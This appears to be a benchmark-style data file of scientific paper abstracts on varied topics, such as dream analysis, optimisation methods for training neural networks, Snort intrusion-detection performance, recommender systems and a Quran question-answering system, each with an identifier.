"text": "Models of dream analysis either assume a continuum of waking and dreaming or the existence of two dissociated realities. Both approaches rely on different methodology. Whereas continuity models are based on content analysis, discontinuity models use a structural approach. In our study, we applied both methods to test specific hypotheses about continuity or discontinuity. We contrasted dream reports of congenitally deaf-mute and congenitally paraplegic individuals with those of non-handicapped controls. Continuity theory would predict that either the deficit itself or compensatory experiences would surface in the dream narrative. We found that dream form and content of sensorially limited persons was indifferent from those of non-handicapped controls. Surprisingly, perceptual representations, even of modalities not experienced during waking, were quite common in the dream reports of our handicapped subjects. Results are discussed with respect to feedforward mechanisms and protoconsciousness theory of dreaming.",
"title": ""
},
{
"docid": "4cb25adf48328e1e9d871940a97fdff2",
"text": "This article is concerned with parameters identification problems and computer modeling of thrust generation subsystem for small unmanned aerial vehicles (UAV) quadrotor type. In this paper approach for computer model generation of dynamic process of thrust generation subsystem that consists of fixed pitch propeller, EC motor and power amplifier, is considered. Due to the fact that obtainment of aerodynamic characteristics of propeller via analytical approach is quite time-consuming, and taking into account that subsystem consists of as well as propeller, motor and power converter with microcontroller control system, which operating algorithm is not always available from manufacturer, receiving trusted computer model of thrust generation subsystem via analytical approach is impossible. Identification of the system under investigation is performed from the perspective of “black box” with the known qualitative description of proceeded there dynamic processes. For parameters identification of subsystem special laboratory rig that described in this paper was designed.",
"title": ""
},
{
"docid": "ffdeaeb1df2fbaaa203fc19b08c69cbe",
"text": "In the past decade, the population of disability grew rapidly and became one of main problems in our society. The significant amounts of impaired patients include not only lower limb but also upper limb impairment such as the motor function of arm and hand. However, physical therapy requires high personal expenses and takes long time to complete the rehabilitation. In order to solve the problem mentioned above, a wearable hand exoskeleton system was developed in this paper. The hand exoskeleton system typically designed to accomplish the requirements for rehabilitation. Figure 1 shows the prototype of hand exoskeleton system which can be easily worn on human hand. The developed exoskeleton finger can provide bi-directional movements in bending and extension motion for all joints of the finger through cable transmission. The kinematic relations between the fingertip and metacarpal was derived and verified. Moreover, the construction of control system is presented in this paper. The preliminary experiment results for finger's position control have demonstrated that the proposed device is capable of accommodating to the aforementioned variables.",
"title": ""
},
{
"docid": "6234f9fc871fb8444d67bb9376e43ddd",
"text": "The paper proposes a novel method to detect fire and/or flame by processing the video data generated by an ordinary camera monitoring a scene. In addition to ordinary motion and color clues, flame and fire flicker are detected by analyzing the video in the wavelet domain. Periodic behavior in flame boundaries is detected by performing a temporal wavelet transform. Color variations in fire are detected by computing the spatial wavelet transform of moving fire-colored regions. Other clues used in the fire detection algorithm include irregularity of the boundary of the fire-colored region and the growth of such regions in time. All of the above clues are combined to reach a final decision.",
"title": ""
},
{
"docid": "421320aa01ba00a91a843f2c6f710224",
"text": "Visual simulation of natural phenomena has become one of the most important research topics in computer graphics. Such phenomena include water, fire, smoke, clouds, and so on. Recent methods for the simulation of these phenomena utilize techniques developed in computational fluid dynamics. In this paper, the basic equations (Navier-Stokes equations) for simulating these phenomena are briefly described. These basic equations are used to simulate various natural phenomena. This paper then explains our applications of the equations for simulations of smoke, clouds, and aerodynamic sound.",
"title": ""
},
{
"docid": "2e4ac47cdc063d76089c17f30a379765",
"text": "Determination of the type and origin of the body fluids found at a crime scene can give important insights into crime scene reconstruction by supporting a link between sample donors and actual criminal acts. For more than a century, numerous types of body fluid identification methods have been developed, such as chemical tests, immunological tests, protein catalytic activity tests, spectroscopic methods and microscopy. However, these conventional body fluid identification methods are mostly presumptive, and are carried out for only one body fluid at a time. Therefore, the use of a molecular genetics-based approach using RNA profiling or DNA methylation detection has been recently proposed to supplant conventional body fluid identification methods. Several RNA markers and tDMRs (tissue-specific differentially methylated regions) which are specific to forensically relevant body fluids have been identified, and their specificities and sensitivities have been tested using various samples. In this review, we provide an overview of the present knowledge and the most recent developments in forensic body fluid identification and discuss its possible practical application to forensic casework.",
"title": ""
},
{
"docid": "999331062a055e820ad7db50e6c0f312",
"text": "OBJECTIVE: To develop a valid, reliable instrument to measure the functional health literacy of patients. DESIGN: The Test of Functional Health Literacy in Adults (TOFHLA) was developed using actual hospital materials. The TOFHLA consists of a 50-item reading comprehension and 17-item numerical ability test, taking up to 22 minutes to administer. The TOFHLA, the Wide Range Achievement Test-Revised (WRAT-R), and the Rapid Estimate of Adult Literacy in Medicine (REALM) were administered for comparison. A Spanish version was also developed (TOFHLA-S). SETTING: Outpatient settings in two public teaching hospitals. PATIENTS: 256 English- and 249 Spanish-speaking patients were approached. 78% of the English- and 82% of the Spanish-speaking patients gave informed consent, completed a demographic survey, and took the TOFHLA or TOFHLA-S. RESULTS: The TOFHLA showed good correlation with the WRAT-R and the REALM (correlation coefficients 0.74 and 0.84, respectively). Only 52% of the English speakers completed more than 80% of the questions correctly. 15% of the patients could not read and interpret a prescription bottle with instructions to take one pill by mouth four times daily, 37% did not understand instructions to take a medication on an empty stomach, and 48% could not determine whether they were eligible for free care. CONCLUSIONS: The TOFHLA is a valid, reliable indicator of patient ability to read health-related materials. Data suggest that a high proportion of patients cannot perform basic reading tasks. Additional work is needed to determine the prevalence of functional health illiteracy and its effect on the health care experience.",
"title": ""
},
{
"docid": "c62a2f7fae5d56617b71ffc070a30839",
"text": "Digitization brings new possibilities to ease our daily life activities by the means of assistive technology. Amazon Alexa, Microsoft Cortana, Samsung Bixby, to name only a few, heralded the age of smart personal assistants (SPAs), personified agents that combine artificial intelligence, machine learning, natural language processing and various actuation mechanisms to sense and influence the environment. However, SPA research seems to be highly fragmented among different disciplines, such as computer science, human-computer-interaction and information systems, which leads to ‘reinventing the wheel approaches’ and thus impede progress and conceptual clarity. In this paper, we present an exhaustive, integrative literature review to build a solid basis for future research. We have identified five functional principles and three research domains which appear promising for future research, especially in the information systems field. Hence, we contribute by providing a consolidated, integrated view on prior research and lay the foundation for an SPA classification scheme.",
"title": ""
},
{
"docid": "f61d5c1b0c17de6aab8a0eafedb46311",
"text": "The use of social media creates the opportunity to turn organization-wide knowledge sharing in the workplace from an intermittent, centralized knowledge management process to a continuous online knowledge conversation of strangers, unexpected interpretations and re-uses, and dynamic emergence. We theorize four affordances of social media representing different ways to engage in this publicly visible knowledge conversations: metavoicing, triggered attending, network-informed associating, and generative role-taking. We further theorize mechanisms that affect how people engage in the knowledge conversation, finding that some mechanisms, when activated, will have positive effects on moving the knowledge conversation forward, but others will have adverse consequences not intended by the organization. These emergent tensions become the basis for the implications we draw.",
"title": ""
},
{
"docid": "81ca8bbbcb825d98367e9eed8b0baecb",
"text": "We show that relation extraction can be reduced to answering simple reading comprehension questions, by associating one or more natural-language questions with each relation slot. This reduction has several advantages: we can (1) learn relationextraction models by extending recent neural reading-comprehension techniques, (2) build very large training sets for those models by combining relation-specific crowd-sourced questions with distant supervision, and even (3) do zero-shot learning by extracting new relation types that are only specified at test-time, for which we have no labeled training examples. Experiments on a Wikipedia slot-filling task demonstrate that the approach can generalize to new questions for known relation types with high accuracy, and that zero-shot generalization to unseen relation types is possible, at lower accuracy levels, setting the bar for future work on this task.",
"title": ""
},
{
"docid": "c4d0a1cd8a835dc343b456430791035b",
"text": "Social networks offer an invaluable amount of data from which useful information can be obtained on the major issues in society, among which crime stands out. Research about information extraction of criminal events in Social Networks has been done primarily in English language, while in Spanish, the problem has not been addressed. This paper propose a system for extracting spatio-temporally tagged tweets about crime events in Spanish language. In order to do so, it uses a thesaurus of criminality terms and a NER (named entity recognition) system to process the tweets and extract the relevant information. The NER system is based on the implementation OSU Twitter NLP Tools, which has been enhanced for Spanish language. Our results indicate an improved performance in relation to the most relevant tools such as Standford NER and OSU Twitter NLP Tools, achieving 80.95% precision, 59.65% recall and 68.69% F-measure. The end result shows the crime information broken down by place, date and crime committed through a webservice.",
"title": ""
},
{
"docid": "2a6999ec21789e40d1cba1b1a98529b2",
"text": "With the increasing popularity of Internet commerce, a wealth of information about the customers can now be readily acquired on-line. An important example is the customers’ preference ratings for the various products offered by the company. Successful mining of these ratings can thus allow the company’s direct marketing campaigns to provide automatic product recommendations. In general, these recommender systems are based on two complementary techniques. Content-based systems match customer interests with information about the products, while collaborative systems utilize preference ratings from the other customers. In this paper, we address some issues faced by these systems, and study how recent machine learning algorithms, namely the support vector machine and the latent class model, can be used to alleviate these problems. D 2002 Elsevier Science B.V. All rights reserved.",
"title": ""
},
{
"docid": "1cf43e11b59d7c482c9ab565208238a2",
"text": "A powerful integrated fan-out (InFO) wafer level system integration (WLSI) technology has been developed to integrate application processor chip with memory package for smart mobile devices. This novel InFO technology is the first high performance Fan-Out Wafer Level Package (FO_WLP) with multi-layer high density interconnects proposed to the industry. In this paper we present the detailed comparison of InFO packages on package (InFO_PoP) with several other previously proposed 3D package solutions. Result shows that InFO_PoP has more optimized overall results on system performance, leakage power and area (form factor) than others, to meet the ever-increasing system requirements of mobile computing. InFO technology has been successfully qualified on package level with robust component and board level reliability. It is also qualified at interconnect level with high electromigration resistance. With its high flexibility and strong capability of multi-chips integration for both homogeneous and heterogeneous sub-systems, InFO technology not only provides a system scaling solution but also complements the chip scaling and helps to sustain the Moore's Law for the smart mobile as well as internet of things (IoT) applications.",
"title": ""
},
{
"docid": "f10438293c046a86515e303e39b6607b",
"text": "Remote measurement of the blood volume pulse via photoplethysmography (PPG) using digital cameras and ambient light has great potential for healthcare and affective computing. However, traditional RGB cameras have limited frequency resolution. We present results of PPG measurements from a novel five band camera and show that alternate frequency bands, in particular an orange band, allowed physiological measurements much more highly correlated with an FDA approved contact PPG sensor. In a study with participants (n = 10) at rest and under stress, correlations of over 0.92 (p <; 0.01) were obtained for heart rate, breathing rate, and heart rate variability measurements. In addition, the remotely measured heart rate variability spectrograms closely matched those from the contact approach. The best results were obtained using a combination of cyan, green, and orange (CGO) bands; incorporating red and blue channel observations did not improve performance. In short, RGB is not optimal for this problem: CGO is better. Incorporating alternative color channel sensors should not increase the cost of such cameras dramatically.",
"title": ""
},
{
"docid": "30e0918ec670bdab298f4f5bb59c3612",
"text": "Consider a single hard disk drive (HDD) composed of rotating platters and a single magnetic head. We propose a simple internal coding framework for HDDs that uses coding across drive blocks to reduce average block seek times. In particular, instead of the HDD controller seeking individual blocks, the drive performs coded-seeking: It seeks the closest subset of coded blocks, where a coded block contains partial information from multiple uncoded blocks. Coded-seeking is a tool that relaxes the scheduling of a full traveling salesman problem (TSP) on an HDD into a k-TSP. This may provide opportunities for new scheduling algorithms and to reduce average read times.",
"title": ""
},
{
"docid": "bd2707625e9077837f26b53d9f9c4382",
"text": "Planar transformer parasitics are difficult to model due to the complex winding geometry and their nonlinear and multivariate nature. This paper provides parametric models for planar transformer parasitics based on finite element simulations of a variety of winding design parameters using the Design of Experiments (DoE) methodology. A rotatable Central Composite Design (CCD) is employed based on a full 24 factorial design to obtain equations for the leakage inductance, inter and intra-winding capacitances, resistance, output current, and output voltage. Using only 25 runs, the final results can be used to replace time-intensive finite element simulations for a wide range of planar transformer winding design options. Validation simulations were performed to confirm the accuracy of the model. Results are presented using a planar E18/4/10 core set and can be extended to a variety of core shapes and sizes.",
"title": ""
},
{
"docid": "76849958320dde148b7dadcb6113d9d3",
"text": "Numerous recent approaches attempt to remove image blur due to camera shake, either with one or multiple input images, by explicitly solving an inverse and inherently ill-posed deconvolution problem. If the photographer takes a burst of images, a modality available in virtually all modern digital cameras, we show that it is possible to combine them to get a clean sharp version. This is done without explicitly solving any blur estimation and subsequent inverse problem. The proposed algorithm is strikingly simple: it performs a weighted average in the Fourier domain, with weights depending on the Fourier spectrum magnitude. The method's rationale is that camera shake has a random nature and therefore each image in the burst is generally blurred differently. Experiments with real camera data show that the proposed Fourier Burst Accumulation algorithm achieves state-of-the-art results an order of magnitude faster, with simplicity for on-board implementation on camera phones.",
"title": ""
},
{
"docid": "ad55ca7e3e027eb688fc41d557b21b00",
"text": "Intrusion Detection Systems (IDS) are among the fastest growing technologies in computer security domain. These systems are designed to identify/ prevent any hostile intrusion into a network. Today, variety of open source and commercial IDS are available to match the users/ network requirements. It has been accepted that the open source intrusion detection systems enjoys more support over commercial systems on account of cost, flexible configuration, online support, cross platform implementation etc. Among open source IDS, Snort has secured a prominent place and has been considered as a de facto standard in the IDS market. Snort is the real time packet analyser and packet logger that perform packet payload inspection by using contents matching algorithms. The system has been considered as a good alternative to expensive and heavy duty Network Intrusion Detection systems (NIDS). This research work has focussed on analysing the performance of Snort under heavy traffic conditions. This has been done on a test bench specifically designed to replicate the current day network traffic. Snort has been evaluated on different operating systems (OS) platforms and hardware resources by subjecting it to different categories of input traffic. Attacks were also injected to determine the detection quality of the system under different conditions. Our results have identified a strong performance limitation of Snort; it was unable to withstand few hundred mega bits per second of network traffic. This has generated queries on the performance of Snort and opened a new debate on the efficacy of open source systems.",
"title": ""
},
{
"docid": "8830ac3811056de2e5a9656504c7aa0c",
"text": "Mobile Music Touch (MMT) helps teach users to play piano melodies while they perform other tasks. MMT is a lightweight, wireless haptic music instruction system consisting of fingerless gloves and a mobile Bluetooth enabled computing device, such as a mobile phone. Passages to be learned are loaded into the mobile phone and are played repeatedly while the user performs other tasks. As each note of the music plays, vibrators on each finger in the gloves activate, indicating which finger is used to play each note. We present two studies on the efficacy of MMT. The first measures 16 subjects' ability to play a passage after using MMT for 30 minutes while performing a reading comprehension test. The MMT system was significantly more effective than a control condition where the passage was played repeatedly but the subjects' fingers were not vibrated. The second study compares the amount of time required for 10 subjects to replay short, randomly generated passages using passive training versus active training. Participants with no piano experience could repeat the passages after passive training while subjects with piano experience often could not.",
"title": ""
}
] | scidocsrr |
8bb3bc967fb1bdf65c975be0db37c540 | Learning Step Size Controllers for Robust Neural Network Training | [
{
"docid": "6af09f57f2fcced0117dca9051917a0d",
"text": "We present a novel per-dimension learning rate method for gradient descent called ADADELTA. The method dynamically adapts over time using only first order information and has minimal computational overhead beyond vanilla stochastic gradient descent. The method requires no manual tuning of a learning rate and appears robust to noisy gradient information, different model architecture choices, various data modalities and selection of hyperparameters. We show promising results compared to other methods on the MNIST digit classification task using a single machine and on a large scale voice dataset in a distributed cluster environment.",
"title": ""
},
{
"docid": "00d9e5370a3b14d51795a25c97a3ebfb",
"text": "Policy search is a successful approach to reinforcement learning. However, policy improvements often result in the loss of information. Hence, it has been marred by premature convergence and implausible solutions. As first suggested in the context of covariant policy gradients (Bagnell and Schneider 2003), many of these problems may be addressed by constraining the information loss. In this paper, we continue this path of reasoning and suggest the Relative Entropy Policy Search (REPS) method. The resulting method differs significantly from previous policy gradient approaches and yields an exact update step. It works well on typical reinforcement learning benchmark problems. Introduction Policy search is a reinforcement learning approach that attempts to learn improved policies based on information observed in past trials or from observations of another agent’s actions (Bagnell and Schneider 2003). However, policy search, as most reinforcement learning approaches, is usually phrased in an optimal control framework where it directly optimizes the expected return. As there is no notion of the sampled data or a sampling policy in this problem statement, there is a disconnect between finding an optimal policy and staying close to the observed data. In an online setting, many methods can deal with this problem by staying close to the previous policy (e.g., policy gradient methods allow only small incremental policy updates). Hence, approaches that allow stepping further away from the data are problematic, particularly, off-policy approaches Directly optimizing a policy will automatically result in a loss of data as an improved policy needs to forget experience to avoid the mistakes of the past and to aim on the observed successes. However, choosing an improved policy purely based on its return favors biased solutions that eliminate states in which only bad actions have been tried out. This problem is known as optimization bias (Mannor et al. 2007). Optimization biases may appear in most onand off-policy reinforcement learning methods due to undersampling (e.g., if we cannot sample all state-actions pairs prescribed by a policy, we will overfit the taken actions), model errors or even the policy update step itself. Copyright c © 2010, Association for the Advancement of Artificial Intelligence (www.aaai.org). All rights reserved. Policy updates may often result in a loss of essential information due to the policy improvement step. For example, a policy update that eliminates most exploration by taking the best observed action often yields fast but premature convergence to a suboptimal policy. This problem was observed by Kakade (2002) in the context of policy gradients. There, it can be attributed to the fact that the policy parameter update δθ was maximizing it collinearity δθ∇θJ to the policy gradient while only regularized by fixing the Euclidian length of the parameter update δθ δθ = ε to a stepsize ε. Kakade (2002) concluded that the identity metric of the distance measure was the problem, and that the usage of the Fisher information metric F (θ) in a constraint δθF (θ)δθ = ε leads to a better, more natural gradient. Bagnell and Schneider (2003) clarified that the constraint introduced in (Kakade 2002) can be seen as a Taylor expansion of the loss of information or relative entropy between the path distributions generated by the original and the updated policy. Bagnell and Schneider’s (2003) clarification serves as a key insight to this paper. 
In this paper, we propose a new method based on this insight that allows us to estimate new policies given a data distribution, for both off-policy and on-policy reinforcement learning. We start from the optimal control problem statement subject to the constraint that the loss in information is bounded by a maximal step size. Note that the methods proposed in (Bagnell and Schneider 2003; Kakade 2002; Peters and Schaal 2008) used a small fixed step size instead. As we do not work in a parametrized policy gradient framework, we can directly compute a policy update based on all information observed from previous policies or exploratory sampling distributions. All sufficient statistics can be determined by optimizing the dual function that yields the equivalent of a value function of a policy for a data set. We show that the method outperforms the previous policy gradient algorithms (Peters and Schaal 2008) as well as SARSA (Sutton and Barto 1998). Background & Notation We consider the regular reinforcement learning setting (Sutton and Barto 1998; Sutton et al. 2000) of a stationary Markov decision process (MDP) with n states s and m actions a. When an agent is in state s, he draws an action a ∼ π(a|s) from a stochastic policy π. Subsequently, the",
"title": ""
},
{
"docid": "a9b20ad74b3a448fbc1555b27c4dcac9",
"text": "A new learning algorithm for multilayer feedforward networks, RPROP, is proposed. To overcome the inherent disadvantages of pure gradient-descent, RPROP performs a local adaptation of the weight-updates according to the behaviour of the errorfunction. In substantial difference to other adaptive techniques, the effect of the RPROP adaptation process is not blurred by the unforseeable influence of the size of the derivative but only dependent on the temporal behaviour of its sign. This leads to an efficient and transparent adaptation process. The promising capabilities of RPROP are shown in comparison to other wellknown adaptive techniques.",
"title": ""
}
] | [
{
"docid": "dcafec84cfcfad2c9c679e43eb87949a",
"text": "A novel design of a microstrip patch antenna with switchable slots (PASS) is proposed to achieve circular polarization diversity. Two orthogonal slots are incorporated into the patch and two pin diodes are utilized to switch the slots on and off. By turning the diodes on or off, this antenna can radiate with either right hand circular polarization (RHCP) or left hand circular polarization (LHCP) using the same feeding probe. Experimental results validate this concept. This design demonstrates useful features for wireless communication applications and future planetary missions.",
"title": ""
},
{
"docid": "c8be0e643c72c7abea1ad758ac2b49a8",
"text": "Visual attention plays an important role to understand images and demonstrates its effectiveness in generating natural language descriptions of images. On the other hand, recent studies show that language associated with an image can steer visual attention in the scene during our cognitive process. Inspired by this, we introduce a text-guided attention model for image captioning, which learns to drive visual attention using associated captions. For this model, we propose an exemplarbased learning approach that retrieves from training data associated captions with each image, and use them to learn attention on visual features. Our attention model enables to describe a detailed state of scenes by distinguishing small or confusable objects effectively. We validate our model on MSCOCO Captioning benchmark and achieve the state-of-theart performance in standard metrics.",
"title": ""
},
{
"docid": "4dc5aee7d80e2204cc8b2e9305149cca",
"text": "MapReduce offers an ease-of-use programming paradigm for processing large data sets, making it an attractive model for distributed volunteer computing systems. However, unlike on dedicated resources, where MapReduce has mostly been deployed, such volunteer computing systems have significantly higher rates of node unavailability. Furthermore, nodes are not fully controlled by the MapReduce framework. Consequently, we found the data and task replication scheme adopted by existing MapReduce implementations woefully inadequate for resources with high unavailability.\n To address this, we propose MOON, short for MapReduce On Opportunistic eNvironments. MOON extends Hadoop, an open-source implementation of MapReduce, with adaptive task and data scheduling algorithms in order to offer reliable MapReduce services on a hybrid resource architecture, where volunteer computing systems are supplemented by a small set of dedicated nodes. Our tests on an emulated volunteer computing system, which uses a 60-node cluster where each node possesses a similar hardware configuration to a typical computer in a student lab, demonstrate that MOON can deliver a three-fold performance improvement to Hadoop in volatile, volunteer computing environments.",
"title": ""
},
{
"docid": "25e8bbe28852ed0a4175ec8dfaf3b40b",
"text": "Differential evolution (DE) is a well-known optimization algorithm that utilizes the difference of positions between individuals to perturb base vectors and thus generate new mutant individuals. However, the difference between the fitness values of individuals, which may be helpful to improve the performance of the algorithm, has not been used to tune parameters and choose mutation strategies. In this paper, we propose a novel variant of DE with an individual-dependent mechanism that includes an individual-dependent parameter (IDP) setting and an individual-dependent mutation (IDM) strategy. In the IDP setting, control parameters are set for individuals according to the differences in their fitness values. In the IDM strategy, four mutation operators with different searching characteristics are assigned to the superior and inferior individuals, respectively, at different stages of the evolution process. The performance of the proposed algorithm is then extensively evaluated on a suite of the 28 latest benchmark functions developed for the 2013 Congress on Evolutionary Computation special session. Experimental results demonstrate the algorithm's outstanding performance.",
"title": ""
},
{
"docid": "a597592df28e010abdd9b41c48108432",
"text": "This paper deals with the detection of arbitrary static objects in traffic scenes from monocular video using structure from motion. A camera in a moving vehicle observes the road course ahead. The camera translation in depth is known. Many structure from motion algorithms were proposed for detecting moving or nearby objects. However, detecting stationary distant obstacles in the focus of expansion remains quite challenging due to very small subpixel motion between frames. In this work the scene depth is estimated from the scaling of supervised image regions. We generate obstacle hypotheses from these depth estimates in image space. A second step then performs testing of these by comparing with the counter hypothesis of a free driveway. The approach can detect obstacles already at distances of 50m and more with a standard focal length. This early detection allows driver warning and safety precaution in good time.",
"title": ""
},
{
"docid": "b6f3dab3391a594712fdad3b31be2062",
"text": "Social media has become a part of our daily life and we use it for many reasons. One of its uses is to get our questions answered. Given a multitude of social media sites, however, one immediate challenge is to pick the most relevant site for a question. This is a challenging problem because (1) questions are usually short, and (2) social media sites evolve. In this work, we propose to utilize topic specialization to find the most relevant social media site for a given question. In particular, semantic knowledge is considered for topic specialization as it can not only make a question more specific, but also dynamically represent the content of social sites, which relates a given question to a social media site. Thus, we propose to rank social media sites based on combined search engine query results. Our algorithm yields compelling results for providing a meaningful and consistent site recommendation. This work helps further understand the innate characteristics of major social media platforms for the design of social Q&A systems.",
"title": ""
},
{
"docid": "0576e9a526a296f39eb81e1b591985aa",
"text": "Although significant progress has been made in SLAM and object detection in recent years, there are still a series of challenges for both tasks, e.g., SLAM in dynamic environments and detecting objects in complex environments. To address these challenges, we present a novel robotic vision system, which integrates SLAM with a deep neural networkbased object detector to make the two functions mutually beneficial. The proposed system facilitates a robot to accomplish tasks reliably and efficiently in an unknown and dynamic environment. Experimental results show that compare to the state-of-the-art robotic vision systems, the proposed system has three advantages: i) it greatly improves the accuracy and robustness of SLAM in dynamic environments by removing unreliable features from moving objects leveraging the object detector, ii) it builds an instance-level semantic map of the environment in an online fashion using the synergy of the two functions for further semantic applications; and iii) it improves the object detector so that it can detect/recognize objects effectively under more challenging conditions such as unusual viewpoints, poor lighting condition, and motion blur, by leveraging the object map.",
"title": ""
},
{
"docid": "9864597d714ba07b9fc502ab6f1baee3",
"text": "Foreground object segmentation is a critical step for many image analysis tasks. While automated methods can produce high-quality results, their failures disappoint users in need of practical solutions. We propose a resource allocation framework for predicting how best to allocate a fixed budget of human annotation effort in order to collect higher quality segmentations for a given batch of images and automated methods. The framework is based on a proposed prediction module that estimates the quality of given algorithm-drawn segmentations. We demonstrate the value of the framework for two novel tasks related to \"pulling the plug\" on computer and human annotators. Specifically, we implement two systems that automatically decide, for a batch of images, when to replace 1) humans with computers to create coarse segmentations required to initialize segmentation tools and 2) computers with humans to create final, fine-grained segmentations. Experiments demonstrate the advantage of relying on a mix of human and computer efforts over relying on either resource alone for segmenting objects in three diverse datasets representing visible, phase contrast microscopy, and fluorescence microscopy images.",
"title": ""
},
{
"docid": "02bae85905793e75950acbe2adcc6a7b",
"text": "The olfactory system is an essential part of human physiology, with a rich evolutionary history. Although humans are less dependent on chemosensory input than are other mammals (Niimura 2009, Hum. Genomics 4:107-118), olfactory function still plays a critical role in health and behavior. The detection of hazards in the environment, generating feelings of pleasure, promoting adequate nutrition, influencing sexuality, and maintenance of mood are described roles of the olfactory system, while other novel functions are being elucidated. A growing body of evidence has implicated a role for olfaction in such diverse physiologic processes as kin recognition and mating (Jacob et al. 2002a, Nat. Genet. 30:175-179; Horth 2007, Genomics 90:159-175; Havlicek and Roberts 2009, Psychoneuroendocrinology 34:497-512), pheromone detection (Jacob et al. 200b, Horm. Behav. 42:274-283; Wyart et al. 2007, J. Neurosci. 27:1261-1265), mother-infant bonding (Doucet et al. 2009, PLoS One 4:e7579), food preferences (Mennella et al. 2001, Pediatrics 107:E88), central nervous system physiology (Welge-Lüssen 2009, B-ENT 5:129-132), and even longevity (Murphy 2009, JAMA 288:2307-2312). The olfactory system, although phylogenetically ancient, has historically received less attention than other special senses, perhaps due to challenges related to its study in humans. In this article, we review the anatomic pathways of olfaction, from peripheral nasal airflow leading to odorant detection, to epithelial recognition of these odorants and related signal transduction, and finally to central processing. Olfactory dysfunction, which can be defined as conductive, sensorineural, or central (typically related to neurodegenerative disorders), is a clinically significant problem, with a high burden on quality of life that is likely to grow in prevalence due to demographic shifts and increased environmental exposures.",
"title": ""
},
{
"docid": "61fcd05449ecaa60b3c5772eb3efc935",
"text": "Corresponding Author: Suhaib Kh. Hamed Center for Artificial Intelligence Technology (CAIT), Faculty of Information Science and Technology, University Kebangsaan Malaysia, Bangi, 43600, Selangor, Malaysia Tel:0060-1139044355 Email: Suhaib83.programmer@gmail.com Abstract: In spite of great efforts that have been made to present systems that support the user’s need of the answers from the Holy Quran, the current systems of English translation of Quran still need to do more investigation in order to develop the process of retrieving the accurate verse based on user’s question. The Islamic terms are different from one document to another and might be undefined for the user. Thus, the need emerged for a Question Answering System (QAS) that retrieves the exact verse based on a semantic search of the Holy Quran. The main objective of this research is to develop the efficiency of the information retrieval from the Holy Quran based on QAS and retrieving an accurate answer to the user’s question through classifying the verses using the Neural Network (NN) technique depending on the purpose of the verses’ contents, in order to match between questions and verses. This research has used the most popular English translation of the Quran of Abdullah Yusuf Ali as the data set. In that respect, the QAS will tackle these problems by expanding the question, using WordNet and benefitting from the collection of Islamic terms in order to avoid differences in the terms of translations and question. In addition, this QAS classifies the Al-Baqarah surah into two classes, which are Fasting and Pilgrimage based on the NN classifier, to reduce the retrieval of irrelevant verses since the user’s questions are asking for Fasting and Pilgrimage. Hence, this QAS retrieves the relevant verses to the question based on the N-gram technique, then ranking the retrieved verses based on the highest score of similarity to satisfy the desire of the user. According to F-measure, the evaluation of classification by using NN has shown an approximately 90% level and the evaluation of the proposed approach of this research based on the entire QAS has shown an approximately 87% level. This demonstrates that the QAS succeeded in providing a promising outcome in this critical field.",
"title": ""
},
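A toy illustration of the retrieval step described in the passage above: the question is expanded with synonyms and then scored against candidate verses by word n-gram overlap. The synonym dictionary, the scoring formula, and the placeholder verse texts are all assumptions for illustration; this is not the authors' system and the strings are not actual translation text.

```python
from collections import Counter

def ngrams(tokens, n=2):
    # Word n-grams; unigrams are included so short questions still match.
    grams = list(tokens)
    grams += [" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]
    return Counter(grams)

def expand(question, synonyms):
    # Toy "WordNet-style" expansion using a small synonym dictionary (assumed).
    tokens = question.lower().replace("?", "").split()
    return tokens + [s for t in tokens for s in synonyms.get(t, [])]

def rank_verses(question, verses, synonyms):
    q = ngrams(expand(question, synonyms))
    scores = []
    for vid, text in verses.items():
        v = ngrams(text.lower().split())
        overlap = sum((q & v).values())              # shared n-gram counts
        scores.append((overlap / (sum(q.values()) or 1), vid))
    return sorted(scores, reverse=True)

# Illustrative placeholder data only.
verses = {
    "2:183": "fasting is prescribed to you as it was prescribed to those before you",
    "2:196": "and complete the pilgrimage in the service of god",
}
synonyms = {"sawm": ["fasting"], "hajj": ["pilgrimage"]}
print(rank_verses("When was sawm prescribed?", verses, synonyms))
```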
{
"docid": "8c2661934098aa65cd3b6c9e7701eb1c",
"text": "In every educational institution, attendance for students is compulsory to obtain good knowledge of the lessons taught in the classrooms and also for gaining wisdom as well as the personality development. A biometric attendance system is designed and implemented for efficient real time monitoring as well as transparency in the management of student's genuine attendance using GSM based wireless fingerprint terminals (WFTs). This system can be suitable to deploy at the educational institutions. Each individual has a unique pattern of fingerprints motivates the use of them for biometric authentication and are verified for finding the presence of the students in the institute. In this paper, two different approaches are discussed to authenticate the captured fingerprint in the verification process. The first approach uses data base created by the organization itself and the second approach uses the Aadhaar Central Identification Repository (CIDR). Wireless fingerprint terminals are responsible to capture and store the attendance records of the students in the device data base and updating them to the server data base. SMS Alerts to students and their parents are sent in case of their irregularity, absence or shortage of attendance. The same system can be extended for the use of avoiding malpractice in the examinations as a part of examination monitoring system.",
"title": ""
},
{
"docid": "c8967be119df778e98954a7e94bee4ca",
"text": "We consider the problem of predicting real valued scores for reviews based on various categories of features of the review text, and other metadata associated with the review, with the purpose of generating a rank for a given list of reviews. For this task, we explore various machine learning models and evaluate the effectiveness of them through a well known measure for goodness of fit. We also explored regularization methods to reduce variance in the model. Random forests was the most effective regressor in the end, outperforming all the other models that we have tried.",
"title": ""
},
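A minimal sketch of the review-score pipeline described above: TF-IDF text features plus one metadata feature feed a random forest regressor, and predicted scores induce a ranking. The toy reviews, the choice of features, and the hyperparameters are assumptions; the paper's actual feature categories are not reproduced here.

```python
import numpy as np
from sklearn.ensemble import RandomForestRegressor
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split

# Toy data standing in for (review text, metadata, score) triples.
texts = ["great food and service", "terrible wait, cold dishes",
         "average place, decent prices", "loved the dessert menu"] * 25
lengths = np.array([len(t.split()) for t in texts]).reshape(-1, 1)
scores = np.array([4.5, 1.5, 3.0, 4.0] * 25)

X_text = TfidfVectorizer(ngram_range=(1, 2)).fit_transform(texts).toarray()
X = np.hstack([X_text, lengths])                    # text features + a metadata feature
X_tr, X_te, y_tr, y_te = train_test_split(X, scores, random_state=0)

model = RandomForestRegressor(n_estimators=200, random_state=0)
model.fit(X_tr, y_tr)
print("R^2 (goodness of fit):", r2_score(y_te, model.predict(X_te)))

# Ranking a list of reviews by predicted score:
ranking = np.argsort(-model.predict(X_te))
print("rank order of test reviews:", ranking[:5])
```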
{
"docid": "583f20bb9e308abbaa1223d3a13a0869",
